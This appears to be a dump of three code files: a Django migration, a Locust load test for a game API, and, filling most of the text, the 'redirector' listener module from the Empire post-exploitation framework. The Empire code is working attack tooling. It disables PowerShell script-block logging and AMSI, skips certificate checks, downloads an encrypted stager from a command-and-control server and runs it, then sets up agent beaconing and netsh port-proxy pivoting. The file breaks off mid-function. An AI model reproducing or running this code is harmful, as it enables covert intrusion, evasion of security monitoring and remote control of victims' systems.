# Generated by Django 2.1.3 on 2018-11-22 11:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('services', '0001_initial'),
('incidents', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='incident',
name='service_key',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='incident', to='services.Service'),
),
migrations.AddField(
model_name='incident',
name='service_to_escalate_to',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='service_to_escalate_to_id', to='services.Service'),
),
migrations.AlterUniqueTogether(
name='incident',
unique_together={('service_key', 'incident_key')},
),
]
| 31.15625
| 183
| 0.633902
|
794b2406f92c554dd6278e54904d215536ab9642
| 5,647
|
py
|
Python
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | 2
|
2021-12-12T03:45:18.000Z
|
2021-12-21T03:53:23.000Z
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | 1
|
2022-03-26T15:13:29.000Z
|
2022-03-26T15:13:29.000Z
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | null | null | null |
import csv
import time
from json import JSONDecodeError
from random import choice
import requests
from locust import TaskSet, task, HttpUser, between
import logging
# TODO figure out how to do setup for entire process?
with open('../testdata.csv', 'r+') as f_uc:
reader = csv.reader(f_uc, )
next(reader, None)
USER_CREDENTIALS = list(reader)
with open('../usernames.csv', 'r+') as f_u:
reader = csv.reader(f_u)
next(reader, None)
USERNAMES = list(reader)
"""
# For now this makes sure users are in database, run it if they aren't
for line in USER_CREDENTIALS:
username, email, password = line
requests.post("http://localhost/api/v1/users", json={
"username": username, "email": email, "password": password
})
"""
# this one is kinda useless
class RegisterWithUniqueUsersSteps(TaskSet):
def on_start(self):
if len(USER_CREDENTIALS) > 0:
self.username, self.email, self.password = USER_CREDENTIALS.pop()
@task
def register(self):
logging.info('Register with %s username, %s email and %s password', self.username, self.email, self.password)
self.client.post("/users", json={
"username": self.username, "email": self.email, "password": self.password
})
while True:
time.sleep(1)
# TODO debug
class FriendsModule(TaskSet):
def on_start(self):
if len(USER_CREDENTIALS) > 0:
self.username, self.email, self.password = USER_CREDENTIALS.pop()
logging.info('Login with %s username and %s password', self.username, self.password)
with self.client.post("/token",
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data={"username": self.username, "password": self.password
}) as response:
self.token = response.json()['access_token']
@task(10)
def get_friends(self):
self.client.get(
"/users/me/friends",
headers={"authorization": "Bearer " + self.token})
@task(10)
def send_random_friend_request(self):
username = choice(USERNAMES)[0]
logging.info('Friend request to %s username', username)
with self.client.post(
"/users/me/friends/requests/send",
headers={"authorization": "Bearer " + self.token},
json={"username": username}) as response:
logging.info(response)
@task(3)
def accept_random_request(self):
with self.client.get(
"/users/me/friends/requests",
headers={"authorization": "Bearer " + self.token}) as response:
# ?
logging.info(response.json())
f_requests = list(response.json())
if len(f_requests) > 0:
req = choice(f_requests)
with self.client.post(
f"/users/me/friends/requests/accept",
headers={"authorization": "Bearer " + self.token},
json={"id": req['id']}) as response1:
logging.info(response1.json())
@task(4)
def decline_random_request(self):
with self.client.get(
"/users/me/friends/requests",
headers={"authorization": "Bearer " + self.token}) as response:
# ?
logging.info(response.json())
f_requests = list(response.json())
if len(f_requests) > 0:
req = choice(f_requests)
with self.client.post(
f"/users/me/friends/requests/decline",
headers={"authorization": "Bearer " + self.token},
json={"id": req['id']}) as response1:
logging.info(response1.json())
@task(1)
def stop(self):
self.interrupt()
class LoginWithUniqueUsersSteps(TaskSet):
def on_start(self):
if len(USER_CREDENTIALS) > 0:
self.username, self.email, self.password = USER_CREDENTIALS.pop()
@task
def login(self):
logging.info('Login with %s username and %s password', self.username, self.password)
with self.client.post("/token",
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data={"username": self.username, "password": self.password
}) as response:
try:
self.client.get(
"/users/me",
headers={"authorization": "Bearer " + response.json()['access_token']})
except JSONDecodeError:
response.failure("Response could not be decoded as JSON")
except KeyError:
response.failure("Response did not contain expected key 'access_token'")
"""
class LoginWithUniqueUsersTest(HttpUser):
wait_time = between(1, 5)
tasks = {LoginWithUniqueUsersSteps: 5}
host = "http://localhost/api/v1"
sock = None
"""
class FriendsTest(HttpUser):
wait_time = between(1, 5)
tasks = {FriendsModule: 5}
host = "http://localhost/api/v1"
sock = None
""" Figure this one out later
class RegisterWithUniqueUsersTest(HttpUser):
wait_time = between(1, 5)
tasks = {RegisterWithUniqueUsersSteps: 5}
host = "http://localhost/api/v1"
sock = None
"""
"""
class LaserTacticsGuestUser(HttpUser):
@task
def users(self):
self.client.get("/users")
@task
def lobby(self):
self.client.get("/lobby?skip=0&limit=100")
"""
| 33.217647
| 117
| 0.573225
|
794b245680d3e5c55ac94f0297107e6ab5dc39c1
| 44,407
|
py
|
Python
|
lib/listeners/redirector.py
|
Gui-Luz/Empire
|
6f5eeff5f46dd085e1317cb09b39853a2fce5d13
|
[
"BSD-3-Clause"
] | 5,720
|
2017-02-02T13:59:40.000Z
|
2022-03-31T09:50:10.000Z
|
lib/listeners/redirector.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 866
|
2017-02-02T10:56:31.000Z
|
2020-01-17T07:47:05.000Z
|
lib/listeners/redirector.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 2,181
|
2017-02-04T10:28:41.000Z
|
2022-03-31T04:36:56.000Z
|
import base64
import random
import copy
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'redirector',
'Author': ['@xorrior'],
'Description': ("Internal redirector listener. Active agent required. Listener options will be copied from another existing agent."),
# categories - client_server, peer_to_peer, broadcast, third_party
'Category' : ('peer_to_peer'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Listener name. This needs to be the name of the agent that will serve as the internal pivot',
'Required' : True,
'Value' : ""
},
'internalIP' : {
'Description' : 'Internal IP address of the agent. Yes, this could be pulled from the db but it becomes tedious when there is multiple addresses.',
'Required' : True,
'Value' : ''
},
'ListenPort' : {
'Description' : 'Port for the agent to listen on.',
'Required' : True,
'Value' : 80
},
'Listener' : {
'Description' : 'Name of the listener to clone',
'Required' : True,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {} # used to keep track of any threaded instances of this server
# optional/specific for this module
# set the default staging key to the controller db default
#self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
If there's a default response expected from the server that the client needs to ignore,
(i.e. a default HTTP page), put the generation here.
"""
print helpers.color("[!] default_response() not implemented for pivot listeners")
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/template generate_launcher(): no language specified!')
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('"+ proxy.lower() +"');")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
# read in the stager base
f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
if host.endswith("/"):
host = host[0:-1]
if workingHours != "":
stager = stager.replace('SET_WORKINGHOURS', workingHours)
if killDate != "":
stager = stager.replace('SET_KILLDATE', killDate)
# # patch the server and key information
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", stage1)
stager = stager.replace("index.php", stage2)
# # base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
This should be implemented for the module.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start(self, name=''):
"""
If a server component needs to be started, implement the kick off logic
here and the actual server code in another function to facilitate threading
(i.e. start_server() in the http listener).
"""
tempOptions = copy.deepcopy(self.options)
listenerName = self.options['Listener']['Value']
# validate that the Listener does exist
if self.mainMenu.listeners.is_listener_valid(listenerName):
# check if a listener for the agent already exists
if self.mainMenu.listeners.is_listener_valid(tempOptions['Name']['Value']):
print helpers.color("[!] Pivot listener already exists on agent %s" % (tempOptions['Name']['Value']))
return False
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
sessionID = self.mainMenu.agents.get_agent_id_db(tempOptions['Name']['Value'])
isElevated = self.mainMenu.agents.is_agent_elevated(sessionID)
if self.mainMenu.agents.is_agent_present(sessionID) and isElevated:
if self.mainMenu.agents.get_language_db(sessionID).startswith("po"):
#logic for powershell agents
script = """
function Invoke-Redirector {
param($ListenPort, $ConnectHost, [switch]$Reset, [switch]$ShowAll)
if($ShowAll){
$out = netsh interface portproxy show all
if($out){
$out
}
else{
"[*] no redirectors currently configured"
}
}
elseif($Reset){
$out = netsh interface portproxy reset
if($out){
$out
}
else{
"[+] successfully removed all redirectors"
}
}
else{
if((-not $ListenPort)){
"[!] netsh error: required option not specified"
}
else{
$ConnectAddress = ""
$ConnectPort = ""
$parts = $ConnectHost -split(":")
if($parts.Length -eq 2){
# if the form is http[s]://HOST or HOST:PORT
if($parts[0].StartsWith("http")){
$ConnectAddress = $parts[1] -replace "//",""
if($parts[0] -eq "https"){
$ConnectPort = "443"
}
else{
$ConnectPort = "80"
}
}
else{
$ConnectAddress = $parts[0]
$ConnectPort = $parts[1]
}
}
elseif($parts.Length -eq 3){
# if the form is http[s]://HOST:PORT
$ConnectAddress = $parts[1] -replace "//",""
$ConnectPort = $parts[2]
}
if($ConnectPort -ne ""){
$out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
if($out){
$out
}
else{
"[+] successfully added redirector on port $ListenPort to $ConnectHost"
}
}
else{
"[!] netsh error: host not in http[s]://HOST:[PORT] format"
}
}
}
}
Invoke-Redirector"""
script += " -ConnectHost %s" % (listenerOptions['Host']['Value'])
script += " -ListenPort %s" % (tempOptions['ListenPort']['Value'])
# clone the existing listener options
self.options = copy.deepcopy(listenerOptions)
for option, values in self.options.iteritems():
if option.lower() == 'name':
